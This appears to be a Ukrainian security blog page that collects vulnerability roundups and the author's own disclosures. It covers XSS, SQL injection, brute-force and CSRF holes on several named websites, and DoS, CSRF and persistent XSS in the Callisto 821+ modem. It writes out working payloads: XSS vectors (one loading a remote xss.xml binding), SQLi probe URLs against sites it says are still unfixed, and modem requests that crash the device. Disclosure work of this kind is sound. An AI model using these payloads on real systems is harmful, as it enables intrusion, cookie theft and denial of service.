Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• HP StorageWorks Storage Mirroring, Remote Execution of Arbitrary Code (деталі)
• SQL Injection in HTML-EDIT CMS (деталі)
• Path disclosure in Habari (деталі)
• Multiple XSS Vulnerabilities in Openfire 3.6.4 Administrative Section (деталі)
• XSS vulnerability in Habari (деталі)
• Multiple CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section (деталі)
• XSS in HTML-EDIT CMS (деталі)
• LinkSys BEFSR41 Multiple Stored Xss (деталі)
• Path disclosure in HTML-EDIT CMS (деталі)
• XSS vulnerability in ImpressCMS (деталі)

У червні, 25.06.2010, а також додатково 17.06.2011, я знайшов Brute Force та Cross-Site Scripting уразливості на проекті http://about42.nl. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на about42.nl.

Brute Force:

http://about42.nl/www/showinfo.php

XSS:

POST запит на сторінці http://about42.nl/www/showinfo.php

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі UserID.

GET/POST запит на сторінці http://about42.nl/www/showheaders.php
<script>alert(document.cookie)</script>В HTTP заголовках: User-Agent, Accept, Accept-Language, Accept-Encoding, Accept-Charset, Referer, а також майже в будь-яких довільних заголовках.

Дані XSS атаки через заголовки можна провести через флеш, про що я писав в статті Відправка серверних заголовків в Flash. Але враховуючи те, що на сайті немає crossdomain.xml, то атака не спрацює в нових версіях флеш-плагіна (тільки в старих версіях), про що я писав у даній статті.

Тому потрібно буде скористатися іншими методами, зокрема для заголовка User-Agent, про що я розповідав в статті XSS атаки через заголовок User-Agent. Деякі з зазначених методів підійдуть і для інших заголовків.

13.10.2010

У червні, 27.06.2010, я знайшов нову Cross-Site Scripting уразливість на сайті http://bigmir.net, обійшови їхній WAF (що я вже робив багато разів). Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на dnevnik.bigmir.net.

Детальна інформація про уразливість з’явиться пізніше.

22.06.2011

XSS:

http://passport.bigmir.net/logout?url=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==

Дана уразливість вже виправлена. І як і в більшості випадків з Бігміром, зробили вони це втихаря (після мого повідомлення), не подякувавши мені. А варто не забувати дякувати людям. При цьому виправлений лише даний вектор атаки, але можливі інші вектори (при цьому потрібно буде обійти їхній WAF).

Зазначу, що в даному функціоналі є також Redirector уразливість, про яку я писав в 2008 році, і яка досі не виправлена.

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив Denial of Service, Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести DoS, CSRF або XSS атаку.

DoS:

http://192.168.1.1/configuration/ports.html?120

При даному запиті відбувається рестарт модема.

CSRF:

Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

В розділі RIP Port Configuration (http://192.168.1.1/configuration/ports.html?10) через CSRF можлива зміна параметрів RIP порта.

В розділі Advanced RIP Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?10) через CSRF можлива зміна параметрів RIP порта.

В розділі Bridge Port Configuration (http://192.168.1.1/configuration/ports.html?12) через CSRF можлива зміна параметрів Bridge порта.

В розділі Advanced Bridge Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?12) через CSRF можлива зміна параметрів Bridge порта.

XSS:

Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

В розділі RIP Port Configuration (http://192.168.1.1/configuration/ports.html?10) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced RIP Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?10) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Bridge Port Configuration (http://192.168.1.1/configuration/ports.html?12) в деяких текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced Bridge Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?12) в деяких текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В даній добірці уразливості в веб додатках:

• Multiple XSS injection vulnerabilities and a offsite redirection flaw within HP System Management Homepage (Insight Manager) (деталі)
• SQL injection in Hycus CMS (деталі)
• HP Insight Diagnostics Online Edition Running on Linux and Windows, Remote Cross Site Scripting (XSS) (деталі)
• SQL injection in Hycus CMS (деталі)
• XSS in Sybase Afaria (деталі)
• SQL injection in Hycus CMS (деталі)
• Security update for libxml2 (деталі)
• Path disclosure in GetSimple CMS (деталі)
• Citrix Access Gateway Command Injection Vulnerability (деталі)
• XSS vulnerability in Habari (деталі)

Продовжуючи тему уразливостей в ADSL модемі Callisto 821+, розповім вам про нові уразливості в даному модемі. У квітні, 07.04.2011, я виявив Denial of Service, Cross-Site Request Forgery та Cross-Site Scripting уразливості в ADSL модемі Callisto 821+ (SI2000 Callisto821+ Router).

Уразлива версія SI2000 Callisto821+ Router: X7821 Annex A v1.0.0.0 / Argon 4×1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. Дана модель з іншими прошивками також повинна бути вразливою.

Дані атаки потрібно проводити на власника модему, який залогінений в адмінку. Враховуючи, що малоймовірно застати його в такому стані, то можна використати раніше згадані уразливості для проведення віддаленого логіну (щоб залогінити його в адмінку). Після чого можна спокійно провести DoS, CSRF або XSS атаку.

DoS:

При відправці GET або POST запитів в розділах Ethernet Port Configuration (http://192.168.1.1/configuration/ports.html?95) і Advanced Ethernet Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?95) вібдувається довготривалий DoS модему. В моїх дослідженнях модем не працював до 16 годин (доки сам не перезавантажився). Єдине, що в даному випадку можна зробити - це вручну перезавантажити модем (шляхом його виключення-включення).

http://192.168.1.1/configuration/ports.html/edit?EmWeb_ns:vim:6=95&EmWeb_ns:vim:2.ImPorts.ethernet:MAC=00:01:38:83:6f:24
http://192.168.1.1/configuration/ports_advanced.html/edit?EmWeb_ns:vim:6=95&EmWeb_ns:vim:2.ImPorts.ethernet:MAC=00:01:38:83:6f:24

Дані атаки спрацюють при дефолтній конфігурації модема (коли він в режимі bridge) і не спрацюють коли конфігурація змінена (коли він в режимі router).

CSRF:

Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

В розділі IGMPProxy Port Configuration (http://192.168.1.1/configuration/ports.html?8) через CSRF можлива зміна параметрів Upstream If і Forward All.

В розділі Advanced IGMPProxy Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?8) через CSRF можлива зміна параметрів Upstream If і Forward All.

XSS:

Дані розділи є прихованими (вони не відображаються в адмінці), але до них можна дістатися вказавши відповідний номер в URL.

В розділі IGMPProxy Port Configuration (http://192.168.1.1/configuration/ports.html?8) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

В розділі Advanced IGMPProxy Port Configuration (http://192.168.1.1/configuration/ports_advanced.html?8) у всіх текстових полях та деяких прихованих полях мають місце persistent XSS уразливості.

21.07.2010

У липні, 01.07.2010, я знайшов SQL Injection уразливість на проекті http://interavto.kiev.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.06.2011

SQL Injection:

http://interavto.kiev.ua/index.php?content_id=-1%20or%20version()%3E4

Зараз сайт не працює. Замість виправлення дірок (цієї та багатьох інших, що є в движку сайта), адміни вирішили закрити його.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wysi та Events Manager Extended і в самому WordPress. Для котрих з’явилися експлоіти. Wysi - це плагін для заміні вбудованого WYSIWYG-редактора на новий, Events Manager Extended - це плагін для управління та відображення подій. А також витік логінів в WP, що стосуються версій WP 2.х і 3.х.

• WordPress Wysi 0.0.2 Shell Upload (деталі)
• WordPress Events Manager 3.1.2 SQL Injection (деталі)
• WordPress User IDs and User Names Disclosure (деталі)

Вищезгадана уразливість в движку була виправлена в WordPress 3.1.3 (причому неякісно) і як я вже зазначав, вона відома вже багато років. Ця дірка пов’язана з шаблоном автора, через який можна проводити ще одну атаку для визначення логінів, про що я згадував в статті визначення логінів в WordPress. Таких уразливостей чимало в WP.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Alt-N WebAdmin Source Code Disclosure (деталі)
• LFI in Hycus CMS (деталі)
• SQL injection in Hycus CMS (деталі)
• HP Discovery & Dependency Mapping Inventory (DDMI) Running on Windows, Remote Cross SIte Scripting (XSS) (деталі)
• XSS vulnerability in Injader CMS (деталі)
• SQL injection in Injader CMS (деталі)
• HP Power Manager (HPPM) Running on Linux and Windows, Remote Execution of Arbitrary Code (деталі)
• SQL injection in Injader CMS (деталі)
• XSS vulnerability in Injader CMS (деталі)
• HP Insight Management Agents Running on Linux and Windows, Remote Full Path Disclosure (деталі)

20.07.2010

У липні, 01.07.2010, я знайшов SQL Injection уразливість на проекті http://ledovskih.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

18.06.2010

SQL Injection:

http://ledovskih.com.ua/index.php?content_id=-1%20or%20version()%3E4

Дана уразливість досі не виправлена.